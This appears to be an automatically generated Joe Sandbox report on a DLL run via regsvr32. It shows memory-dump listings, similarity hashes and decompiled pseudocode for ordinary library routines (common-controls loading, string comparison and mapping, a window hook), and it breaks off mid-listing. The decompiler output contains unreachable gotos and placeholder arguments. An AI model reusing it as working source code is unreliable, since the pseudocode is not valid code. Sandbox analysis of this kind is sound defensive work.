Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: 9a2b15cf48598985895dda6b75c276a9973aea8a257d9f9ed8152c68c258acc6
Instruction ID: 0024953bd2d5d929ba01695959eac2c5f0652c5aefdeab829efdefedd909000f
Opcode Fuzzy Hash: 9a2b15cf48598985895dda6b75c276a9973aea8a257d9f9ed8152c68c258acc6
Instruction Fuzzy Hash: 56014431F0522A9FE745DFB69CC49AA3FECFB4E292745042BF509D2121DB3188119B60

Uniqueness

Uniqueness Score: -1.00%

Function 10044B98 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E10044B98(signed short _a4, signed int _a8) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				CHAR* _t16;
				signed short _t17;

				_t16 = "COMCTL32.DLL";
				_t14 = GetModuleHandleA(_t16);
				_t6 = LoadLibraryA(_t16);
				_t13 = _t6;
				if(_t13 == 0) {
					return _t6;
				} else {
					_t17 = 0;
					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
					if(_t7 != 0) {
						_push(_a4);
						if( *_t7() != 0) {
							_t17 = _a4;
							if(_t14 == 0) {
								__imp__#17();
								_t17 = _t17 | 0x00003fc0;
							}
						}
					} else {
						if((_a8 & 0x00003fc0) == _a8) {
							__imp__#17();
							_t17 = 0x3fc0;
						}
					}
					FreeLibrary(_t13);
					return _t17;
				}
			}

0x10044b9a
0x10044ba8
0x10044baa
0x10044bb0
0x10044bb4
0x10044c0c
0x10044bb6
0x10044bbc
0x10044bbe
0x10044bc6
0x10044be3
0x10044beb
0x10044bed
0x10044bf3
0x10044bf5
0x10044bfb
0x10044bfb
0x10044bf3
0x10044bc8
0x10044bd7
0x10044bd9
0x10044bdf
0x10044bdf
0x10044bd7
0x10044c01
0x00000000
0x10044c07

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,10044E92,?,00020000), ref: 10044BA1
LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 10044BAA
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 10044BBE
#17.COMCTL32 ref: 10044BD9
#17.COMCTL32 ref: 10044BF5
FreeLibrary.KERNEL32(00000000), ref: 10044C01

Strings

COMCTL32.DLL, xrefs: 10044B9A, 10044BA0, 10044BA7
InitCommonControlsEx, xrefs: 10044BB6

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID: COMCTL32.DLL$InitCommonControlsEx
API String ID: 1437655972-4218389149
Opcode ID: 11267809ea28192dd58d63ae02b3e4811b35714f00ffef69835227d691180dc6
Instruction ID: 1cd72a0593c195c73ff1e55461b74a25f7d1a241e8357edb374451e7923fb661
Opcode Fuzzy Hash: 11267809ea28192dd58d63ae02b3e4811b35714f00ffef69835227d691180dc6
Instruction Fuzzy Hash: 09F0A43660A623D7D301DBA9ACCC60B72E8FF84691B2B0435F544E3210DF24DC0087A9

Uniqueness

Uniqueness Score: -1.00%

Function 10029275 Relevance: 13.7, APIs: 9, Instructions: 221
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E10029275(int _a4, int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				int _v36;
				short* _v40;
				short* _v44;
				char _v58;
				struct _cpinfo _v64;
				void* _v80;
				int _t65;
				int _t66;
				int _t69;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				int _t88;
				void* _t96;
				char _t99;
				char _t101;
				intOrPtr _t104;
				intOrPtr _t105;
				int _t107;
				short* _t109;
				int _t111;
				int _t114;
				intOrPtr _t115;
				short* _t116;

				_push(0xffffffff);
				_push(0x10081318);
				_push(E10022B50);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t115;
				_t116 = _t115 - 0x30;
				_v28 = _t116;
				_t107 = 1;
				if( *0x100952e8 != 0) {
					L5:
					_t111 = _a16;
					if(_t111 > 0) {
						_t88 = E100294F2(_a12, _t111);
						_pop(_t96);
						_t111 = _t88;
						_a16 = _t111;
					}
					if(_a24 > 0) {
						_t87 = E100294F2(_a20, _a24);
						_pop(_t96);
						_a24 = _t87;
					}
					_t65 =  *0x100952e8;
					if(_t65 != 2) {
						if(_t65 != _t107) {
							goto L48;
						} else {
							if(_a28 == 0) {
								_a28 =  *0x1009505c;
							}
							if(_t111 == 0 || _a24 == 0) {
								if(_t111 != _a24) {
									if(_a24 <= _t107) {
										if(_t111 > _t107) {
											L30:
											_push(3);
											goto L18;
										} else {
											if(GetCPInfo(_a28,  &_v64) == 0) {
												goto L48;
											} else {
												if(_t111 <= 0) {
													if(_a24 <= 0) {
														goto L39;
													} else {
														if(_v64 >= 2) {
															_t82 =  &_v58;
															if(_v58 != 0) {
																while(1) {
																	_t104 =  *((intOrPtr*)(_t82 + 1));
																	if(_t104 == 0) {
																		goto L20;
																	}
																	_t99 =  *_a20;
																	if(_t99 <  *_t82 || _t99 > _t104) {
																		_t82 = _t82 + 2;
																		if( *_t82 != 0) {
																			continue;
																		} else {
																			goto L20;
																		}
																	} else {
																		goto L17;
																	}
																	goto L49;
																}
															}
														}
														goto L20;
													}
												} else {
													if(_v64 >= 2) {
														_t84 =  &_v58;
														if(_v58 != 0) {
															while(1) {
																_t105 =  *((intOrPtr*)(_t84 + 1));
																if(_t105 == 0) {
																	goto L30;
																}
																_t101 =  *_a12;
																if(_t101 <  *_t84 || _t101 > _t105) {
																	_t84 = _t84 + 2;
																	if( *_t84 != 0) {
																		continue;
																	} else {
																		goto L30;
																	}
																} else {
																	goto L17;
																}
																goto L50;
															}
														}
													}
													goto L30;
													L50:
												}
											}
										}
									} else {
										L20:
										_t66 = _t107;
									}
								} else {
									L17:
									_push(2);
									L18:
									_pop(_t66);
								}
							} else {
								L39:
								_t69 = MultiByteToWideChar(_a28, 9, _a12, _t111, 0, 0);
								_v32 = _t69;
								if(_t69 == 0) {
									goto L48;
								} else {
									_v8 = 0;
									E1001B2B0(_t69 + _t69 + 0x00000003 & 0x000000fc, _t96);
									_v28 = _t116;
									_v40 = _t116;
									_v8 = _v8 | 0xffffffff;
									if(_v40 == 0 || MultiByteToWideChar(_a28, _t107, _a12, _t111, _v40, _v32) == 0) {
										goto L48;
									} else {
										_t114 = MultiByteToWideChar(_a28, 9, _a20, _a24, 0, 0);
										_v36 = _t114;
										if(_t114 == 0) {
											goto L48;
										} else {
											_v8 = _t107;
											E1001B2B0(_t114 + _t114 + 0x00000003 & 0x000000fc, _t96);
											_v28 = _t116;
											_t109 = _t116;
											_v44 = _t109;
											_v8 = _v8 | 0xffffffff;
											if(_t109 == 0 || MultiByteToWideChar(_a28, 1, _a20, _a24, _t109, _t114) == 0) {
												goto L48;
											} else {
												_t66 = CompareStringW(_a4, _a8, _v40, _v32, _t109, _t114);
											}
										}
									}
								}
							}
						}
					} else {
						_t66 = CompareStringA(_a4, _a8, _a12, _t111, _a20, _a24);
					}
				} else {
					if(CompareStringW(0, 0, 0x10080700, _t107, 0x10080700, _t107) == 0) {
						if(CompareStringA(0, 0, 0x100806fc, _t107, 0x100806fc, _t107) == 0) {
							L48:
							_t66 = 0;
						} else {
							 *0x100952e8 = 2;
							goto L5;
						}
					} else {
						 *0x100952e8 = _t107;
						goto L5;
					}
				}
				L49:
				 *[fs:0x0] = _v20;
				return _t66;
				goto L50;
			}

0x10029278
0x1002927a
0x1002927f
0x1002928a
0x1002928b
0x10029292
0x10029298
0x100292a5
0x100292a6
0x100292e8
0x100292e8
0x100292ed
0x100292f3
0x100292f9
0x100292fa
0x100292fc
0x100292fc
0x10029302
0x1002930a
0x10029310
0x10029311
0x10029311
0x10029314
0x1002931c
0x1002933b
0x00000000
0x10029341
0x10029344
0x1002934b
0x1002934b
0x10029350
0x1002935e
0x1002936b
0x10029376
0x100293b9
0x100293b9
0x00000000
0x10029378
0x10029387
0x00000000
0x1002938d
0x1002938f
0x100293c0
0x00000000
0x100293c2
0x100293c6
0x100293c8
0x100293ce
0x100293d0
0x100293d0
0x100293d5
0x00000000
0x00000000
0x100293da
0x100293de
0x100293e9
0x100293ec
0x00000000
0x100293ee
0x00000000
0x100293ee
0x00000000
0x00000000
0x00000000
0x00000000
0x100293de
0x100293d0
0x100293ce
0x00000000
0x100293c6
0x10029391
0x10029395
0x10029397
0x1002939d
0x1002939f
0x1002939f
0x100293a4
0x00000000
0x00000000
0x100293a9
0x100293ad
0x100293b4
0x100293b7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x100293ad
0x1002939f
0x1002939d
0x00000000
0x00000000
0x10029395
0x1002938f
0x10029387
0x1002936d
0x1002936d
0x1002936d
0x1002936d
0x10029360
0x10029360
0x10029360
0x10029362
0x10029362
0x10029362
0x100293f3
0x100293f3
0x100293fe
0x10029404
0x10029409
0x00000000
0x1002940f
0x1002940f
0x10029419
0x1002941e
0x10029423
0x10029426
0x10029445
0x00000000
0x10029465
0x10029474
0x10029476
0x1002947b
0x00000000
0x1002947d
0x1002947d
0x10029488
0x1002948d
0x10029490
0x10029492
0x10029495
0x100294af
0x00000000
0x100294c8
0x100294d6
0x100294d6
0x100294af
0x1002947b
0x10029445
0x10029409
0x10029350
0x1002931e
0x1002932e
0x1002932e
0x100292a8
0x100292bb
0x100292d8
0x100294de
0x100294de
0x100292de
0x100292de
0x00000000
0x100292de
0x100292bd
0x100292bd
0x00000000
0x100292bd
0x100292bb
0x100294e0
0x100294e6
0x100294f1
0x00000000

APIs

CompareStringW.KERNEL32(00000000,00000000,10080700,00000001,10080700,00000001,00000000,00C50E5C,10023E6D,0000000C,?,10018569,-0000076C,0000000B,0000000B), ref: 100292B3
CompareStringA.KERNEL32(00000000,00000000,100806FC,00000001,100806FC,00000001,?,10023F0A), ref: 100292D0
CompareStringA.KERNEL32(?,?,00000000,10023F0A,?,0000000B,00000000,00C50E5C,10023E6D,0000000C,?,10018569,-0000076C,0000000B,0000000B), ref: 1002932E
GetCPInfo.KERNEL32(0000000B,00000000,00000000,00C50E5C,10023E6D,0000000C,?,10018569,-0000076C,0000000B,0000000B,?,10023F0A), ref: 1002937F
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,0000000B,00000000,00000000,?,10023F0A), ref: 100293FE
MultiByteToWideChar.KERNEL32(?,00000001,00000000,0000000B,?,?,?,10023F0A), ref: 1002945F
MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000,?,10023F0A), ref: 10029472
MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,10023F0A), ref: 100294BE
CompareStringW.KERNEL32(?,?,00000000,00000000,?,00000000,?,00000000,?,10023F0A), ref: 100294D6

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharCompareMultiStringWide$Info
String ID:
API String ID: 1651298574-0
Opcode ID: b97a3202e911ab65aaa724d3b1cbe312c8baf94cea506cef87f8937773bc370e
Instruction ID: a06703520041300c0a70fcb80eaae83a692324771735d266935ae249932be5ff
Opcode Fuzzy Hash: b97a3202e911ab65aaa724d3b1cbe312c8baf94cea506cef87f8937773bc370e
Instruction Fuzzy Hash: 1471DE3290425AEFCF21DF90EC859DE7BBAFB053D4F91412AF954A21A0C3319D52CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10021F1A Relevance: 13.7, APIs: 9, Instructions: 177
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 60%

			E10021F1A(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;

				_push(0xffffffff);
				_push(0x10080ae0);
				_push(E10022B50);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				if( *0x10095188 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E1002213E(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x10095188;
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_a28 =  *0x1009505c;
							}
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E1001B2B0(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E1001B2B0(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x10080700, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x100806fc, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x10095188 = 2;
							goto L5;
						}
					} else {
						 *0x10095188 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}

0x10021f1d
0x10021f1f
0x10021f24
0x10021f2f
0x10021f30
0x10021f37
0x10021f3d
0x10021f48
0x10021f90
0x10021f93
0x10021f9b
0x10021fa1
0x10021fa2
0x10021fa2
0x10021fa5
0x10021fad
0x10021fcf
0x00000000
0x10021fd5
0x10021fd8
0x10021fdf
0x10021fdf
0x10021fef
0x10021fff
0x10022001
0x10022006
0x00000000
0x1002200c
0x1002200c
0x10022017
0x1002201c
0x10022021
0x10022024
0x10022040
0x00000000
0x1002205b
0x1002206d
0x1002206f
0x10022074
0x00000000
0x10022076
0x1002207a
0x100220bc
0x100220cb
0x100220d0
0x100220d3
0x100220d5
0x100220d8
0x100220f2
0x00000000
0x1002210c
0x1002210f
0x10022110
0x10022111
0x10022117
0x1002211a
0x10022113
0x10022113
0x10022114
0x10022114
0x1002212d
0x10022131
0x00000000
0x00000000
0x00000000
0x00000000
0x10022131
0x1002207c
0x1002207f
0x10022137
0x10022137
0x00000000
0x00000000
0x00000000
0x1002207f
0x1002207a
0x10022074
0x10022040
0x10022006
0x10021faf
0x10021fc1
0x10021fc1
0x10021f4a
0x10021f4a
0x10021f4b
0x10021f4e
0x10021f64
0x10021f80
0x100220a8
0x100220a8
0x10021f86
0x10021f86
0x00000000
0x10021f86
0x10021f66
0x10021f66
0x00000000
0x10021f66
0x10021f64
0x100220b0
0x100220bb

APIs

LCMapStringW.KERNEL32(00000000,00000100,10080700,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 10021F5C
LCMapStringA.KERNEL32(00000000,00000100,100806FC,00000001,00000000,00000000), ref: 10021F78
LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 10021FC1
MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 10021FF9
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 10022051
LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 10022067
LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 1002209A
LCMapStringW.KERNEL32(?,?,?,?,?,00000000), ref: 10022102

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 9a0cc47f12365a25935fbfaa581c28125dd40b6016a54939b75328c773875190
Instruction ID: 78021fa7d8939f3e1348f17bd84cce28e2ccf2aaef3eed9a04cc237963e3991b
Opcode Fuzzy Hash: 9a0cc47f12365a25935fbfaa581c28125dd40b6016a54939b75328c773875190
Instruction Fuzzy Hash: 8151383190025AFFDF22CF95DC85EDE7BB9FB49790F90412AFA14A1160D3329961DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002BC70 Relevance: 13.6, APIs: 9, Instructions: 128
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1002BC70() {
				signed int _t35;
				struct HWND__* _t38;
				signed int _t40;
				signed char _t47;
				intOrPtr* _t50;
				long _t51;
				signed int _t55;
				signed int _t56;
				signed int _t57;
				long _t58;
				int _t59;
				void* _t61;
				void* _t64;
				void* _t66;
				void* _t68;
				void* _t69;

				_t58 = GetCurrentThreadId();
				EnterCriticalSection(0x10096ac0);
				if( *0x10096d74 == _t58) {
					L10:
					_t56 =  *0x10096d78; // 0x0
					LeaveCriticalSection(0x10096ac0);
					_t59 =  *(_t64 + 0x18);
					_t51 =  *(_t64 + 0x20);
					__eflags = _t59 - 3;
					if(_t59 == 3) {
						_t61 =  *_t51;
						__eflags =  *((intOrPtr*)(_t61 + 0x28)) - 0x8002;
						if( *((intOrPtr*)(_t61 + 0x28)) != 0x8002) {
							__eflags =  *(_t56 * 4 + 0x10096d90 + _t56 * 4 * 4) & 0x00000001;
							if(__eflags != 0) {
								_t35 = E1002BC30(__eflags,  *(_t61 + 0xc));
								_t64 = _t64 + 4;
								__eflags = _t35;
								if(__eflags != 0) {
									L24:
									_push( *(_t61 + 0xc));
									_push(1);
									_push(0xffff);
									_push( *(_t64 + 0x1c));
									E1002C050(__eflags);
									_t64 = _t64 + 0x10;
								} else {
									_t38 =  *(_t61 + 0xc);
									__eflags = _t38;
									if(_t38 != 0) {
										__eflags =  *0x10096d42 - 0x18;
										if(__eflags != 0) {
											_t40 = E1002BC30(__eflags, GetParent(_t38));
											_t64 = _t64 + 4;
											__eflags = _t40;
											if(__eflags != 0) {
												goto L24;
											}
										}
									}
								}
							}
						} else {
							__eflags =  *0x10096d42 - 0x20;
							if( *0x10096d42 != 0x20) {
								E1002A550( *(_t64 + 0x1c), E1002B900);
								_t64 = _t64 + 8;
							} else {
								__eflags =  *0x10096d40 - 0x35f;
								if( *0x10096d40 < 0x35f) {
									L15:
									 *(_t64 + 0x10) = 1;
								} else {
									_t47 = GetWindowLongA( *(_t64 + 0x1c), 0xfffffff0);
									 *(_t64 + 0x10) = 0;
									__eflags = _t47 & 0x00000004;
									if((_t47 & 0x00000004) == 0) {
										goto L15;
									}
								}
								_t62 =  *(_t64 + 0x1c);
								SendMessageA( *(_t64 + 0x1c), 0x11f0, 0, _t64 + 0x10);
								__eflags =  *(_t64 + 0x10);
								if( *(_t64 + 0x10) != 0) {
									E1002A3B0(_t62, E1002B900);
									_t64 = _t64 + 8;
								}
							}
						}
					}
					_t57 = _t56 << 2;
					__eflags = _t57;
					_t28 = _t57 * 4; // 0x0
					return CallNextHookEx( *(_t57 + _t28 + 0x10096d88), _t59,  *(_t64 + 0x20), _t51);
				} else {
					_t55 = 0;
					_t66 = _t55 -  *0x10096d7c; // 0x0
					if(_t66 < 0) {
						_t50 = 0x10096d84;
						while( *_t50 != _t58) {
							_t50 = _t50 + 0x14;
							_t55 = _t55 + 1;
							_t68 = _t55 -  *0x10096d7c; // 0x0
							if(_t68 < 0) {
								continue;
							} else {
							}
							L7:
							_t69 = _t55 -  *0x10096d7c; // 0x0
							goto L8;
						}
						 *0x10096d78 = _t55;
						 *0x10096d74 = _t58;
						goto L7;
					}
					L8:
					if(_t69 != 0) {
						goto L10;
					} else {
						LeaveCriticalSection(0x10096ac0);
						return CallNextHookEx(0,  *(_t64 + 0x18),  *(_t64 + 0x1c),  *(_t64 + 0x20));
					}
				}
			}

0x1002bc7d
0x1002bc84
0x1002bc90
0x1002bcf3
0x1002bcf3
0x1002bcfe
0x1002bd04
0x1002bd08
0x1002bd0c
0x1002bd0f
0x1002bd15
0x1002bd17
0x1002bd1e
0x1002bda5
0x1002bdad
0x1002bdb3
0x1002bdb8
0x1002bdbb
0x1002bdbd
0x1002bde4
0x1002bdeb
0x1002bdec
0x1002bdee
0x1002bdf3
0x1002bdf4
0x1002bdf9
0x1002bdbf
0x1002bdbf
0x1002bdc2
0x1002bdc4
0x1002bdc6
0x1002bdce
0x1002bdd8
0x1002bddd
0x1002bde0
0x1002bde2
0x00000000
0x00000000
0x1002bde2
0x1002bdce
0x1002bdc4
